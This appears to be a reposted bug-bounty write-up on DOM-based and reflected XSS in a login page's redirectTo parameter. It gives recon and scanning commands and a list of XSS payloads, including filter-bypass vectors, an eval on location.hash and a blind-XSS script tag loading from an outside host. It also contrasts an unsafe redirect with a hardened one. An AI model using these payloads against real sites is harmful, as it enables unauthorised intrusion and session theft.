Last month, during bug hunting, I discovered both DOM-based XSS and reflected XSS (RXSS) vulnerabilities on the login page of a Korean website.
Example:
https://sub[.]example[.]com/login?redirectTo=abc
My Approach
Recon was performed using Subfinder and Amass:
subfinder -d example[.]com -all -recursive -o subd.txt
amass enum --passive -d example[.]com -o subd1.txt
After merging both enumeration results, I used Katana to enumerate endpoints:
katana -list fsubd.txt -silent | tee ep.txt
katana -list fsubd.txt -kf all -d 30 -c 50 -jc -silent | tee ep1.txt
After identifying live targets with httpx, I filtered potential XSS endpoints with:
cat aep.txt | anew | gf xss | uro | tee pxss.txt
I tested the final list with multiple payloads and confirmed working XSS vulnerabilities (both DOM-based and reflected).
You can use Caido to automate testing multiple payloads on the target.
You Should Know:
1. Manual XSS Testing with cURL
curl -s "https://example.com/login?redirectTo=javascript:alert(1)" | grep -i "alert"
2. Automating XSS with Dalfox
dalfox url "https://example.com/login?redirectTo=XSS" --custom-payload xss-payloads.txt
3. Using OWASP ZAP for XSS Scanning
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-baseline.py \
  -t https://example.com/login -g gen.conf -r report.html
4. Crafting XSS Payloads for Bypassing Filters
<svg/onload=alert(document.domain)>
<img src=x onerror=alert(1)>
5. Checking for DOM XSS with Browser Console
console.log(document.location.hash);
eval(document.location.hash.substring(1));
6. Using XSS Hunter for Blind XSS
<script src="https://xss.hunter/x.js"></script>
7. Encoding Payloads for Obfuscation
echo -n "<script>alert(1)</script>" | base64
8. Testing for HTTP Parameter Pollution (HPP) XSS
curl "https://example.com/login?redirectTo=test&redirectTo=javascript:alert(1)"
9. Using Burp Suite for XSS Testing
- Intercept request → Send to Repeater → Insert XSS payload → Check response.
10. Bypassing WAFs with Alternative XSS Vectors
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>
What Undercode Says
XSS remains a critical web vulnerability due to improper input sanitization. Automation tools like Dalfox, Katana, and Caido enhance detection, but manual testing is still essential for bypassing filters. Organizations must implement strict Content Security Policies (CSP) and input validation to mitigate risks.
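The redirectTo pattern from the writeup, shown as an added example rather than code from the post or the affected site: a client-side handler that navigates to the raw parameter (the DOM XSS sink a `javascript:` URL reaches) next to a hardened version that only ever accepts an in-app path. It assumes the login page assigns the parameter to `window.location` after login; the `app.invalid` origin is a constructed stand-in and is never contacted.

```javascript
// Added example (not from the original post). Assumption: the login page reads
// ?redirectTo=... and assigns it to window.location after a successful login.

// Unsafe: the raw value becomes the navigation target. "javascript:alert(1)"
// then runs in the page's origin (DOM-based XSS) and "//evil.example" is an
// open redirect. Returned here so the behaviour can be inspected, not navigated.
function unsafeRedirectTarget(search) {
  return new URLSearchParams(search).get("redirectTo"); // caller: window.location = value
}

// Hardened: resolve the value against a fixed origin and keep it only if it is
// a plain same-origin path. Any scheme (javascript:, data:), scheme-relative
// host (//host), backslash or control-character trick falls back to a default.
function safeRedirectTarget(search, fallback = "/") {
  const value = new URLSearchParams(search).get("redirectTo");
  if (value === null) return fallback;
  const base = "https://app.invalid"; // constructed origin, never contacted
  let parsed;
  try {
    parsed = new URL(value, base);
  } catch {
    return fallback; // unparseable input is not a valid in-app path
  }
  if (parsed.origin !== base) return fallback;            // javascript:, data:, //host, https://host
  if (!value.startsWith("/") || value.startsWith("//")) return fallback; // must be an absolute in-app path
  if (/[\u0000-\u001f\\]/.test(value)) return fallback;   // "/\evil.example", tabs, newlines
  return parsed.pathname + parsed.search + parsed.hash;   // normalised same-origin path only
}
```
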
Prediction
With increasing reliance on JavaScript frameworks, DOM-based XSS will rise, requiring advanced detection techniques. AI-powered scanners may soon automate complex XSS detection.
Expected Output:
- A detailed report confirming XSS vulnerabilities.
- Proof-of-concept (PoC) demonstrating exploitation.
- Recommendations for mitigation (CSP, input sanitization).
Reported By: Gagan Rohila – Hackers Feeds